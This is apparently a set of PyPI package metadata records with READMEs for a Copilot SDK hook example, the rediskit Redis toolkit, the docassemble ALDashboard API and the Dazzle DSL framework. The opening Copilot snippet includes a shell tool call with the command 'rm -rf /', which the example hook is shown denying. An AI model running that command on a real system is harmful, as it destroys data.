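
async def echo(args):
    return args["text"]

async def main():
    tools = {"echo": echo}
    ok = await run_tool_call("echo", {"text": "hi"}, on_pre_tool_use, tools)
    denied = await run_tool_call("shell", {"cmd": "rm -rf /"}, on_pre_tool_use, tools)
    print(ok, denied)

asyncio.run(main())
```

The same shape generalizes to `on_post_tool_use` (wrap the result) and `on_user_prompt_submitted` (rewrite the prompt before dispatch).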
text/markdown
null
GitHub <opensource@github.com>
null
null
GitHub Copilot CLI License 1. License Grant Subject to the terms of this License, GitHub grants you a non‑exclusive, non‑transferable, royalty‑free license to install and run copies of the GitHub Copilot CLI (the “Software”). Subject to Section 2 below, GitHub also grants you the right to reproduce and redistribute unmodified copies of the Software as part of an application or service. 2. Redistribution Rights and Conditions You may reproduce and redistribute the Software only in accordance with all of the following conditions: The Software is distributed only in unmodified form; The Software is redistributed solely as part of an application or service that provides material functionality beyond the Software itself; The Software is not distributed on a standalone basis or as a primary product; You include a copy of this License and retain all applicable copyright, trademark, and attribution notices; and Your application or service is licensed independently of the Software. Nothing in this License restricts your choice of license for your application or service, including distribution under an open source license. This License applies solely to the Software and does not modify or supersede the license terms governing your application or its source code. 3. Scope Limitations This License does not grant you the right to: Modify, adapt, translate, or create derivative works of the Software; Redistribute the Software except as expressly permitted in Section 2; Remove, alter, or obscure any proprietary notices included in the Software; or Use GitHub trademarks, logos, or branding except as necessary to identify the Software. 4. Reservation of Rights GitHub and its licensors retain all right, title, and interest in and to the Software. All rights not expressly granted by this License are reserved. 5. 
Disclaimer of Warranty THE SOFTWARE IS PROVIDED “AS IS,” WITHOUT WARRANTY OF ANY KIND, EXPRESS, IMPLIED, OR STATUTORY, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON‑INFRINGEMENT. THE ENTIRE RISK ARISING OUT OF USE OF THE SOFTWARE REMAINS WITH YOU. 6. Limitation of Liability TO THE MAXIMUM EXTENT PERMITTED BY LAW, IN NO EVENT SHALL GITHUB OR ITS LICENSORS BE LIABLE FOR ANY DAMAGES ARISING OUT OF OR RELATING TO THIS LICENSE OR THE USE OR DISTRIBUTION OF THE SOFTWARE, WHETHER IN CONTRACT, TORT, OR OTHERWISE. 7. Termination This License terminates automatically if you fail to comply with its terms. Upon termination, you must cease all use and distribution of the Software. 8. Notice Regarding GitHub Services (Informational Only) Use of the Software may require access to GitHub services and is subject to the applicable GitHub Terms of Service and GitHub Copilot terms. This License governs only rights related to the Software and does not grant any rights to access or use GitHub services.
null
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: P...
[]
null
null
>=3.9
[]
[]
[]
[ "python-dateutil>=2.9.0.post0", "pydantic>=2.0", "typing-extensions>=4.0.0", "ruff>=0.1.0; extra == \"dev\"", "ty>=0.0.2; extra == \"dev\"", "pytest>=7.0.0; extra == \"dev\"", "pytest-asyncio>=0.21.0; extra == \"dev\"", "pytest-timeout>=2.0.0; extra == \"dev\"", "httpx>=0.24.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/github/copilot-sdk", "Repository, https://github.com/github/copilot-sdk" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:01:13.994462
github_copilot_sdk-0.1.26rc0-py3-none-win_arm64.whl
51,623,667
2d/a3/273dd246b16b39a7b5ae2a49fe017d96b25b50ee0226cd493092817f1528/github_copilot_sdk-0.1.26rc0-py3-none-win_arm64.whl
py3
bdist_wheel
null
false
2b70e82c1126011ef1d7d900ab3ef9a7
a44f812e1fd496fc023c1e0a99d08f4e53e49eba1e54582505d90df45848d6e7
2da3273dd246b16b39a7b5ae2a49fe017d96b25b50ee0226cd493092817f1528
null
[]
1,582
2.4
rediskit
0.0.36
A comprehensive Redis toolkit for Python with caching, memoization, and utilities
# rediskit

A Python toolkit that provides Redis-backed performance and concurrency primitives for applications. It enables developers to add caching, distributed coordination, and data protection to their Python applications with minimal effort.

## Still a work in progress

Many features are still under development, and there will be breaking changes. Please use at your own risk.

## Features

- **Function Result Caching**: Use the `@redis_memoize` decorator to cache expensive function calls with automatic serialization, compression, and encryption
- **Distributed Coordination**: Redis-based distributed locks and semaphores for coordinating access across multiple processes/machines
- **Data Protection**: Multi-version encryption keys with automatic key rotation for sensitive cached data
- **Async Support**: Full support for both synchronous and asynchronous applications
- **Flexible Storage**: Choose between string or hash-based Redis storage patterns
- **Modern Type Hints**: Full type safety with Python 3.12+ syntax

## Installation

```bash
uv add rediskit
# or
poetry add rediskit
```

## Quick Start

### Basic Setup

```python
from rediskit import redis_memoize, init_redis_connection_pool

# Initialize Redis connection pool (call once at app startup)
init_redis_connection_pool()

# Cache expensive function results
@redis_memoize(memoize_key="expensive_calc", ttl=300)
def expensive_calculation(tenantId: str, value: int) -> dict:
    # Simulate expensive computation
    import time
    time.sleep(2)
    return {"result": value * 42}

# Usage
result = expensive_calculation("tenant1", 10)  # Takes 2 seconds
result = expensive_calculation("tenant1", 10)  # Returns instantly from cache
```

### Custom Redis Connection

```python
import redis
from rediskit import redis_memoize

# Use your own Redis connection
my_redis = redis.Redis(host='my-redis-host', port=6379, db=1)

@redis_memoize(
    memoize_key="custom_calc",
    ttl=600,
    connection=my_redis
)
def my_function(tenantId: str, data: dict) -> dict:
    return {"processed": data}
```

### Advanced Caching Options

```python
from rediskit import redis_memoize

# Hash-based storage with encryption
@redis_memoize(
    memoize_key=lambda tenantId, user_id: f"user_profile:{tenantId}:{user_id}",
    ttl=3600,
    storage_type="hash",     # Store in Redis hash for efficient field access
    enable_encryption=True,  # Encrypt sensitive data
    cache_type="zipJson"     # JSON serialization with compression
)
def get_user_profile(tenantId: str, user_id: str) -> dict:
    # Fetch user data from database
    return {"user_id": user_id, "name": "John Doe", "email": "john@example.com"}

# Dynamic TTL and cache bypass
@redis_memoize(
    memoize_key="dynamic_data",
    ttl=lambda tenantId, priority: 3600 if priority == "high" else 300,
    bypass_cache=lambda tenantId, force_refresh: force_refresh
)
def get_dynamic_data(tenantId: str, priority: str, force_refresh: bool = False) -> dict:
    return {"data": "fresh_data", "priority": priority}
```

### Async Support

```python
import asyncio
from rediskit import redis_memoize, init_async_redis_connection_pool

# Initialize async Redis connection pool
await init_async_redis_connection_pool()

@redis_memoize(memoize_key="async_calc", ttl=300)
async def async_expensive_function(tenantId: str, value: int) -> dict:
    await asyncio.sleep(1)  # Simulate async work
    return {"async_result": value * 100}

# Usage
result = await async_expensive_function("tenant1", 5)
```

### Distributed Locking

```python
from rediskit import get_redis_mutex_lock, get_async_redis_mutex_lock

# Synchronous distributed lock
with get_redis_mutex_lock("critical_section", expire=30) as lock:
    # Only one process can execute this block at a time
    perform_critical_operation()

# Async distributed lock
async with get_async_redis_mutex_lock("async_critical_section", expire=30) as lock:
    await perform_async_critical_operation()
```

### Encryption Management

```python
from rediskit import Encrypter

# Generate new encryption keys
encrypter = Encrypter()
new_key = encrypter.generate_new_hex_key()

# Encrypt/decrypt data manually
encrypted = encrypter.encrypt("sensitive data", useZstd=True)
decrypted = encrypter.decrypt(encrypted)
```

## Configuration

Configure rediskit using environment variables:

```bash
# Redis connection settings
export REDISKIT_REDIS_HOST="localhost"
export REDISKIT_REDIS_PORT="6379"
export REDISKIT_REDIS_PASSWORD=""

# Encryption keys (base64-encoded JSON)
export REDISKIT_ENCRYPTION_SECRET="eyJfX2VuY192MSI6ICI0MGViODJlNWJhNTJiNmQ4..."

# Cache settings
export REDISKIT_REDIS_TOP_NODE="my_app_cache"
export REDISKIT_REDIS_SKIP_CACHING="false"
```

## API Reference

### Core Decorators

#### `@redis_memoize`

Cache function results in Redis with configurable options.

**Parameters:**

- `memoize_key`: Cache key (string or callable)
- `ttl`: Time to live in seconds (int, callable, or None)
- `bypass_cache`: Skip cache lookup (bool or callable)
- `cache_type`: Serialization method ("zipJson" or "zipPickled")
- `reset_ttl_upon_read`: Refresh TTL when reading from cache
- `enable_encryption`: Encrypt cached data
- `storage_type`: Redis storage pattern ("string" or "hash")
- `connection`: Custom Redis connection (optional)

### Connection Management

- `init_redis_connection_pool()`: Initialize sync Redis connection pool
- `init_async_redis_connection_pool()`: Initialize async Redis connection pool
- `get_redis_connection()`: Get sync Redis connection
- `get_async_redis_connection()`: Get async Redis connection

### Distributed Locking

- `get_redis_mutex_lock(name, expire, auto_renewal, id)`: Get sync distributed lock
- `get_async_redis_mutex_lock(name, expire, auto_renewal)`: Get async distributed lock

### Encryption

- `Encrypter(keyHexDict)`: Encryption/decryption with key versioning

## Requirements

- Python 3.12+
- Redis server
- Dependencies: redis, redis-lock, nacl, zstd

## License

Apache-2.0 license
text/markdown
null
Badr Elfarri <badr.elfarri@gmail.com>
null
Badr Elfarri <badr.elfarri@gmail.com>
Apache-2.0
redis, cache, memoization, toolkit, async
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3" ]
[]
null
null
>=3.12
[]
[]
[]
[ "pynacl", "redis", "python-redis-lock", "zstd", "httpx", "dotenv" ]
[]
[]
[]
[ "Homepage, https://github.com/badrelfarri/rediskit", "Documentation, https://github.com/badrelfarri/rediskit#readme", "Repository, https://github.com/badrelfarri/rediskit", "Bug Tracker, https://github.com/badrelfarri/rediskit/issues", "Changelog, https://github.com/badrelfarri/rediskit/blob/main/CHANGELOG....
twine/6.1.0 CPython/3.13.7
2026-02-19T22:00:56.030084
rediskit-0.0.36.tar.gz
59,239
e3/30/9eda599ee7f1d003ac77fc7cb501752d2767b5ff3d870e980e043aaf851b/rediskit-0.0.36.tar.gz
source
sdist
null
false
3dd216b7cf218c7e88108b4f19944f6e
4c9c8beaadcf4729f94e7c33dd675efa3f4e96392cf57f1af8674a5363e0b590
e3309eda599ee7f1d003ac77fc7cb501752d2767b5ff3d870e980e043aaf851b
null
[ "LICENSE" ]
204
2.4
docassemble.ALDashboard
1.1.1
Dashboard for some admin tasks
# ALDashboard: a docassemble Admin and Configuration Tool

[![PyPI version](https://badge.fury.io/py/docassemble.ALDashboard.svg)](https://badge.fury.io/py/docassemble.ALDashboard)

A single tool and interview to centralize some tedious Docassemble admin configuration tasks.

![A screenshot of the ALDashboard menu with choices: "Admin only - manage users", "Admin only - stats", "Install assembly line", "Verify API Keys", "Install packages", "update packages", "Package scanner", "View Answer files", "generate review screen draft", "validate docx template", "validation translation files", "prepare translation files", "validate an attachment fields block", "PDF tools", and "Compile Bootstrap theme"](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/29539eec-3891-476b-b248-dd3db986d899)

1. Install the Document Assembly Line packages (support files for [Court Forms Online](https://courtformsonline.org))
1. Searchable user management - reset passwords and change privileges.
1. Installing or updating several packages at once.
1. Listing and viewing the contents of an (unencrypted) interview to facilitate debugging errors on production servers.
1. View analytics/stats captured with `store_variable_snapshot`.
1. List the files inside a particular package installed on the server.
1. Gather files from a user who left the organization/unknown username and password.
1. Review screen generator
1. Validate DOCX Jinja2 templates
1. Generate a [custom bootstrap theme](https://suffolklitlab.org/docassemble-AssemblyLine-documentation/docs/customization/overview#creating-a-custom-theme-from-source-instead-of-with-a-theme-generator) for your interviews.

Ideas:

1. Add a link to the dispatch directive for an existing file in an existing package.
1. Generate translation files [TBD].
## Use

To use, you must create a docassemble API key and add it to your configuration, like this:

`install packages api key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`

If you want the ALDashboard to be a dropdown option for admins and developers, add the following to the configuration before your `install packages api key`:

```yaml
administrative interviews:
  - interview: docassemble.ALDashboard:data/questions/menu.yml
    title: Dashboard
    required privileges:
      - admin
      - developer
```

## ALDashboard API

When installed on a docassemble server, ALDashboard exposes a Flask API at:

- `POST /al/api/v1/dashboard/translation`
- `POST /al/api/v1/dashboard/docx/auto-label`
- `POST /al/api/v1/dashboard/docx/runs`
- `POST /al/api/v1/dashboard/docx/relabel`
- `POST /al/api/v1/dashboard/bootstrap/compile`
- `POST /al/api/v1/dashboard/translation/validate`
- `POST /al/api/v1/dashboard/review-screen/draft`
- `POST /al/api/v1/dashboard/docx/validate`
- `POST /al/api/v1/dashboard/yaml/check`
- `POST /al/api/v1/dashboard/yaml/reformat`
- `POST /al/api/v1/dashboard/pdf/label-fields`
- `POST /al/api/v1/dashboard/pdf/fields/detect`
- `POST /al/api/v1/dashboard/pdf/fields/relabel`
- `GET /al/api/v1/dashboard/jobs/{job_id}`
- `GET /al/api/v1/dashboard/jobs/{job_id}/download`
- `DELETE /al/api/v1/dashboard/jobs/{job_id}`
- `GET /al/api/v1/dashboard/openapi.json`
- `GET /al/api/v1/dashboard/docs`

The API uses docassemble API key authentication via `api_verify()`. Endpoints default to synchronous execution and support `mode=async` (or `async=true`) for Celery-backed processing. To enable async mode, add this module to your docassemble configuration:

```yaml
celery modules:
  - docassemble.ALDashboard.api_dashboard_worker
```

### Endpoint Notes

- `POST /al/api/v1/dashboard/translation`
  - Input: `interview_path`, one or more target languages (`tr_langs`), optional GPT settings.
  - Output: translation XLSX metadata and optional base64 file content.
- `POST /al/api/v1/dashboard/docx/auto-label`
  - Input: DOCX file upload, optional `custom_people_names`.
  - Uses `docassemble.ALToolbox.llms` for OpenAI configuration.
  - Optional per-request overrides: `openai_api`, `openai_base_url`, `openai_model`.
  - Prompt customization: `custom_prompt`, `additional_instructions`.
  - Optional output budget override: `max_output_tokens`.
  - Output: `results` array by default; include `include_labeled_docx_base64=true` to also get updated DOCX bytes.
- `POST /al/api/v1/dashboard/docx/runs`
  - Input: DOCX file upload (or base64 content).
  - Output: parsed run list as `results`, each entry `[paragraph_index, run_index, run_text]`.
  - Traversal includes body paragraphs, tables, headers, and footers.
- `POST /al/api/v1/dashboard/docx/relabel`
  - Input: existing `results` from first-pass label run and/or DOCX upload.
  - Supports index-based edits: `replace_labels_by_index`, `skip_label_indexes`.
  - Supports explicit additions: `add_labels`.
  - Supports range-based rule additions: `add_label_rules` (paragraph range + match conditions).
  - Output: edited `results` array by default; include `include_labeled_docx_base64=true` to also get updated DOCX bytes.
  - In async mode, download binary file output from `GET /al/api/v1/dashboard/jobs/{job_id}/download`.
- `POST /al/api/v1/dashboard/bootstrap/compile`
  - Input: SCSS upload or `scss_text`.
  - Output: compiled CSS text or base64.
  - Operational notes:
    - Requires `node` and `npm` available on server `PATH`.
    - First run downloads Bootstrap source into `/tmp` and runs `npm install`/`npm run css-compile`, so it may be noticeably slower.
    - Requires outbound HTTPS access to fetch Bootstrap and npm dependencies.
    - Writes temporary build artifacts under `/tmp`; ensure adequate disk space and cleanup policies.
- `POST /al/api/v1/dashboard/translation/validate`
  - Input: translation XLSX.
  - Output: structured errors/warnings/empty rows.
- `POST /al/api/v1/dashboard/review-screen/draft`
  - Input: one or more YAML files.
  - Output: generated review-screen YAML draft.
- `POST /al/api/v1/dashboard/docx/validate`
  - Input: one or more DOCX templates.
  - Output: per-file Jinja rendering errors.
- `POST /al/api/v1/dashboard/yaml/check`
  - Input: `yaml_text` (or `yaml_content`) and optional `filename`.
  - Output: structured DAYamlChecker issues with `errors`, `warnings`, and `valid`.
- `POST /al/api/v1/dashboard/yaml/reformat`
  - Input: `yaml_text` (or `yaml_content`), optional `line_length` and `convert_indent_4_to_2`.
  - Output: reformatted YAML in `formatted_yaml` and `changed` boolean.
- `POST /al/api/v1/dashboard/pdf/label-fields`
  - Input: PDF upload.
  - Output: PDF with fields detected and optionally relabeled (backward-compatible alias of `/pdf/fields/detect`).
- `POST /al/api/v1/dashboard/pdf/fields/detect`
  - Input: PDF upload.
  - Optional flags: `relabel_with_ai`, `include_pdf_base64`, `include_parse_stats`.
  - Optional exact-name list: `target_field_names` (ordered list to apply after detection).
  - Output: PDF with detected fields added, plus optional AI/target-name relabeling.
- `POST /al/api/v1/dashboard/pdf/fields/relabel`
  - Input: PDF with existing fields.
  - Relabel modes: `field_name_mapping` (exact old->new map), ordered `target_field_names`, or AI (`relabel_with_ai=true`).
  - Output: Relabeled PDF and resulting field names; optional parse stats/base64 output.
- `GET /al/api/v1/dashboard/jobs/{job_id}/download`
  - Streams the first available file artifact from a completed async job.
  - Optional query parameters:
    - `index` (0-based artifact index)
    - `field` (exact artifact field path from JSON result)

Live docs:

- `GET /al/api/v1/dashboard/openapi.json`
- `GET /al/api/v1/dashboard/docs`

## MCP Bridge API

ALDashboard also exposes a lightweight MCP-style discovery layer over HTTP:

- `POST /al/api/v1/mcp` (JSON-RPC 2.0 endpoint)
- `GET /al/api/v1/mcp` (endpoint metadata)
- `GET /al/api/v1/mcp/tools` (convenience tool listing)
- `GET /al/api/v1/mcp/docs` (human-readable docs)

Supported JSON-RPC methods:

- `initialize`
- `ping`
- `tools/list`
- `tools/call`

`tools/list` discovers tools generated from:

- ALDashboard REST OpenAPI paths (`/al/api/v1/dashboard/...`)
- ALWeaver REST paths (`/al/api/v1/weaver...`) only when `docassemble.ALWeaver` is installed.

For development-only fallback discovery from a local checkout, set:

```bash
export ALDASHBOARD_MCP_DEV_MODE=true
export ALWEAVER_REPO_PATH=~/docassemble-ALWeaver
```

Example:

```bash
curl -X POST "https://YOURSERVER/al/api/v1/mcp" \
  -H "Content-Type: application/json" \
  -H "X-API-Key: YOUR_API_KEY" \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}'
```

Tool execution example:

```bash
curl -X POST "https://YOURSERVER/al/api/v1/mcp" \
  -H "Content-Type: application/json" \
  -H "X-API-Key: YOUR_API_KEY" \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"aldashboard.get_al_api_v1_dashboard_openapi_json","arguments":{}}}'
```

`tools/call` securely reuses the same authenticated request context (for example `X-API-Key` or `Authorization`) and does not require storing a separate API key in MCP configuration.

### DOCX Modes and End-to-End Workflow

Purpose of each mode:

1. `POST /docx/runs`: inspection mode
   - Returns `[paragraph_index, run_index, run_text]`.
   - Use this to understand document coordinates before deterministic edits.
2. `POST /docx/auto-label`: draft generation mode
   - Generates initial label suggestions (`results`).
3. `POST /docx/relabel`: editing/apply mode
   - Edits draft labels (`replace_labels_by_index`, `skip_label_indexes`, `add_labels`, `add_label_rules`).
   - If DOCX content is provided and `include_labeled_docx_base64=true`, returns an updated DOCX.
4. `GET /jobs/{job_id}/download`: async file download mode
   - Streams final binary output from completed async jobs.

Full workflow: upload DOCX -> draft labels -> manual edits (change, delete, add) -> download final DOCX

Step 1. Create draft labels (async)

```bash
curl -X POST "https://YOURSERVER/al/api/v1/dashboard/docx/auto-label" \
  -H "X-API-Key: YOUR_API_KEY" \
  -F "mode=async" \
  -F "file=@/path/to/input.docx" \
  -F "openai_base_url=https://YOURRESOURCE.openai.azure.com/openai/v1/" \
  -F "openai_api=YOUR_AZURE_OPENAI_KEY" \
  -F "openai_model=gpt-5-mini"
```

Step 2. Poll job until `status=succeeded`, then read `data.results`

```bash
curl -H "X-API-Key: YOUR_API_KEY" \
  "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_1"
```

Step 3. Edit labels manually (change one, delete one, add one) and request final DOCX (async)

```bash
curl -X POST "https://YOURSERVER/al/api/v1/dashboard/docx/relabel" \
  -H "Content-Type: application/json" \
  -H "X-API-Key: YOUR_API_KEY" \
  -d '{
    "mode": "async",
    "filename": "input.docx",
    "file_content_base64": "BASE64_DOCX_HERE",
    "results": [[1,0,"{{ letter_date }}",0],[2,0,"{{ old_name }}",0],[3,0,"{{ keep_me }}",0]],
    "replace_labels_by_index": {"0":"{{ edited_letter_date }}"},
    "skip_label_indexes": [1],
    "add_labels": [[0,0,"{{ added_new_label }}",0]],
    "include_labeled_docx_base64": true
  }'
```

Step 4. Poll relabel job, then download final DOCX

```bash
curl -H "X-API-Key: YOUR_API_KEY" \
  "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_3"

curl -L -o final_labeled.docx \
  -H "X-API-Key: YOUR_API_KEY" \
  "https://YOURSERVER/al/api/v1/dashboard/jobs/JOB_ID_FROM_STEP_3/download"
```

## Some screenshots

### Main page

![A screenshot of the ALDashboard menu with choices: "Admin only - manage users", "Admin only - stats", "Install assembly line", "Verify API Keys", "Install packages", "update packages", "Package scanner", "View Answer files", "generate review screen draft", "validate docx template", "validation translation files", "prepare translation files", "validate an attachment fields block", "PDF tools", and "Compile Bootstrap theme"](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/29539eec-3891-476b-b248-dd3db986d899)

### Manage users

![A screenshot that says "Manage users" with the fields "User", "What do you want to do? Reset password or Change user permissions", "New Password", and "Verify new Password"](https://user-images.githubusercontent.com/7645641/123702231-e069ec00-d830-11eb-94dc-5ec0abb86bc9.png)

### Bulk install packages from GitHub

![A screenshot that says "What packages do you want to install?" The fields are for "Github URL", "YAML filename", and "Short name or alias (no spaces)"](https://user-images.githubusercontent.com/7645641/123702290-efe93500-d830-11eb-9fdf-a5935ff4078e.png)

### Bulk update packages

![A screenshot that says "What packages do you want to update?" followed by a list of packages. For example, "docassemble.209aPlaintiffMotionToModify", "docassemble.ALAffidavitOfIndigency", and more.](https://user-images.githubusercontent.com/7645641/123702362-068f8c00-d831-11eb-9ce4-df7a67ffcfeb.png)

### View answer files

View / search sessions by user and interview name

![A screenshot that says "What interview do you want to view sessions for?" The fields are "File name" and "User (leave blank to view all sessions)"](https://user-images.githubusercontent.com/7645641/123702422-1d35e300-d831-11eb-84d5-5e7385deb901.png)

![A screenshot that says "Recently generated sessions for docassemble.MA209AProtectiveOrder:data/questions/209a_package.yml" with 5 sessions below.](https://user-images.githubusercontent.com/7645641/123702464-2cb52c00-d831-11eb-80fc-f2291e824eae.png)

### View interview stats captured with `store_variables_snapshot()`

![A screenshot with the title "Stats for Eviction Moratorium: 9". Below is the text "Total submissions: 9", "Group by: zip | state | modtime", and "Excel Download" followed by a map that can be filtered by state or by date.](https://user-images.githubusercontent.com/7645641/123702623-5e2df780-d831-11eb-8937-6625df74ab22.png)

### Generate a bootstrap theme

![A screenshot with the title "Your file is compiled!", below is the text "You can view and copy your file, or download it directly by right clicking the link to save it as a CSS file". Below that are examples of Bootstrap components like buttons and nav bars.](https://github.com/SuffolkLITLab/docassemble-ALDashboard/assets/6252212/079e428d-4cae-4f75-8b1b-227c28f32a44)
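In a script, the poll-then-read loop from Steps 2 and 4 can be wrapped in a small helper. This is an illustrative sketch, not part of ALDashboard; it assumes only the documented job shape (a `status` of `succeeded` plus a `data` payload) and takes an injectable `get_json` callable so it works with `requests`, `httpx`, or a test stub. The `failed` status check is an assumption:

```python
import time
from typing import Callable

def wait_for_job(
    get_json: Callable[[str], dict],  # e.g. wraps requests.get(url, headers=...).json()
    job_url: str,
    poll_interval: float = 2.0,
    timeout: float = 300.0,
) -> dict:
    """Poll an async job endpoint until it finishes, then return its data payload."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        job = get_json(job_url)
        status = job.get("status")
        if status == "succeeded":
            return job.get("data", {})
        if status == "failed":  # assumed terminal failure status
            raise RuntimeError(f"job failed: {job}")
        time.sleep(poll_interval)
    raise TimeoutError(f"job did not finish within {timeout}s")
```

After this returns, binary artifacts can still be fetched from the `/jobs/{job_id}/download` endpoint as shown in Step 4.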
text/markdown
Quinten Steenhuis
Suffolk Legal Innovation and Technology Lab <litlab@suffolk.edu>
null
null
null
null
[]
[]
https://github.com/SuffolkLITLab/docassemble-ALDashboard
null
null
[]
[]
[]
[ "PyGithub>=2.1.1", "docassemble.ALToolbox>=0.9.2", "python-docx>=1.1.1", "openai>=1.0", "tiktoken", "pyaml", "formfyxer>=1.0.1", "dayamlchecker>=0.2.0", "pyspellchecker>=0.6.3", "ruamel.yaml>=0.17.4", "textstat>=0.7.0" ]
[]
[]
[]
[ "Homepage, https://courtformsonline.org" ]
twine/6.2.0 CPython/3.13.11
2026-02-19T22:00:40.177571
docassemble_aldashboard-1.1.1.tar.gz
186,197
af/5a/c215d64414a1f976814252efe7288ab69e03572fec810940fa52e45d827e/docassemble_aldashboard-1.1.1.tar.gz
source
sdist
null
false
d1624ddda4cf310c65ba3c8d1112e5cb
8a157257262ff3acc5c0906c46c999b97bb48749ebd16e6237c568191096b4da
af5ac215d64414a1f976814252efe7288ab69e03572fec810940fa52e45d827e
MIT
[ "LICENSE" ]
0
2.4
dazzle-dsl
0.33.1
DAZZLE - Domain-Aware, Token-Efficient DSL for LLM-Enabled Apps
# DAZZLE

**Human Intent → Structured DSL → Deterministic Code → Frontier AI Cognition**

<!-- Versions & Compatibility -->
[![Python 3.11+](https://img.shields.io/badge/python-3.11%2B-blue)](https://www.python.org/)
[![Homebrew](https://img.shields.io/badge/homebrew-manwithacat%2Ftap-orange)](https://github.com/manwithacat/homebrew-tap)

<!-- Build & Quality -->
[![CI](https://github.com/manwithacat/dazzle/workflows/CI/badge.svg)](https://github.com/manwithacat/dazzle/actions)
[![codecov](https://codecov.io/gh/manwithacat/dazzle/graph/badge.svg)](https://codecov.io/gh/manwithacat/dazzle)
[![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff)
[![Checked with mypy](https://img.shields.io/badge/mypy-checked-blue.svg)](https://mypy-lang.org/)

<!-- Meta -->
[![Docs](https://img.shields.io/badge/docs-GitHub%20Pages-blue)](https://manwithacat.github.io/dazzle/)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![GitHub stars](https://img.shields.io/github/stars/manwithacat/dazzle.svg?style=social)](https://github.com/manwithacat/dazzle)

DAZZLE is a **declarative application framework**. You describe *what* your application is — its data, its screens, its workflows, its users — and Dazzle figures out *how* to build it. You write `.dsl` files; Dazzle gives you a working web application with a database, API, rendered UI, authentication, and CRUD operations. No code generation step, no build toolchain, no scaffold to maintain.
```bash
cd examples/simple_task && dazzle serve
# UI:  http://localhost:3000
# API: http://localhost:8000/docs
```

---

## Table of Contents

- [The Core Idea](#the-core-idea)
- [Quick Start](#quick-start)
- [How Dazzle Works: The Eight Layers](#how-dazzle-works-the-eight-layers)
- [Layer 1: Entities](#layer-1-entities-your-data-model)
- [Layer 2: Surfaces](#layer-2-surfaces-your-ui)
- [Layer 3: Workspaces](#layer-3-workspaces-your-dashboards)
- [Layer 4: Stories and Processes](#layer-4-stories-and-processes-your-business-logic)
- [Layer 5: Services](#layer-5-services-your-custom-code)
- [Layer 6: The Public Site](#layer-6-the-public-site)
- [Layer 7: Experiences](#layer-7-experiences-multi-step-user-flows)
- [Layer 8: Islands](#layer-8-islands-client-side-interactivity)
- [How the Layers Work Together](#how-the-layers-work-together)
- [The Pipeline: Determinism and Cognition](#the-pipeline-determinism-and-cognition)
- [DSL Constructs Reference](#dsl-constructs-reference)
- [The MCP Tooling Pipeline](#the-mcp-tooling-pipeline)
- [Agent Framework](#agent-framework)
- [Three-Tier Testing](#three-tier-testing)
- [API Packs](#api-packs)
- [Fidelity Scoring](#fidelity-scoring)
- [Why HTMX, Not React](#why-htmx-not-react)
- [Install](#install)
- [IDE Support](#ide-support)
- [Examples](#examples)
- [Project Structure](#project-structure)
- [Documentation](#documentation)
- [Contributing](#contributing)
- [License](#license)

---

## The Core Idea

Dazzle is built on one principle: **the DSL is the application**. There is no code generation step that produces source files you then maintain. The DSL is parsed into a semantic intermediate representation (the AppSpec IR), and the runtime executes that IR directly.

```
DSL Files → Parser + Linker → AppSpec (IR) → Runtime (live app)
                                           → OpenAPI / AsyncAPI specs
                                           → Test generation
                                           → Fidelity scoring
```

This means:

- **Change the DSL, refresh the browser.** The runtime re-reads the IR on every request in dev mode.
- **No generated code to keep in sync.** The DSL is the single source of truth.
- **Every artifact is derivable.** API specs, test suites, demo data, and documentation are all computed from the same IR.
- **The DSL is analyzable.** Because it is deliberately anti-Turing (no arbitrary computation), Dazzle can validate, lint, measure fidelity, and reason about your application statically.

"Declarative" does not mean "limited." Dazzle has a layered architecture that lets you start simple and add complexity only where your business genuinely needs it. A todo app is 20 lines of DSL. A 39-entity accountancy SaaS with state machines, double-entry ledgers, multi-step onboarding wizards, and role-based dashboards is the same language — just more of it.

## Quick Start

```bash
# Install
brew install manwithacat/tap/dazzle   # macOS/Linux (auto-registers MCP server)
# or: pip install dazzle-dsl

# Run the example
cd examples/simple_task
dazzle serve

# Open http://localhost:3000 for the UI
# Open http://localhost:8000/docs for the API
```

That's it. No code generation, no build step — your DSL runs directly.

### First DSL File

```dsl
module my_app

app todo "Todo Application"

entity Task "Task":
  id: uuid pk
  title: str(200) required
  completed: bool=false
  created_at: datetime auto_add

surface task_list "Tasks":
  uses entity Task
  mode: list
  section main:
    field title "Title"
    field completed "Done"
```

Save this as `app.dsl`, run `dazzle serve`, and you have a working application with:

- A database table with correct column types and constraints
- CRUD API endpoints with pagination, filtering, and sorting
- A rendered list UI with sortable columns and a create form
- OpenAPI documentation at `/docs`

---

## How Dazzle Works: The Eight Layers

Dazzle has eight conceptual layers, each handling a different concern. Understanding these layers — and knowing which one is responsible for what — is the key to working effectively with the system.
### Layer 1: Entities (Your Data Model)

An entity is a business concept expressed as structured data. Think of it as a database table, but described at the semantic level rather than the SQL level.

```dsl
entity Company "Company":
  id: uuid pk
  company_name: str required
  company_number: str required unique
  is_vat_registered: bool = false
  trading_status: enum[active, dormant, struck_off] = active
  vat_number: str
  created_at: datetime auto_add
  updated_at: datetime auto_update
```

What Dazzle does with this:

- Creates a database table with correct column types
- Enforces `required` and `unique` constraints
- Sets default values (e.g., `is_vat_registered = false`, `trading_status = active`)
- Generates `auto_add` timestamps on creation and `auto_update` on every save
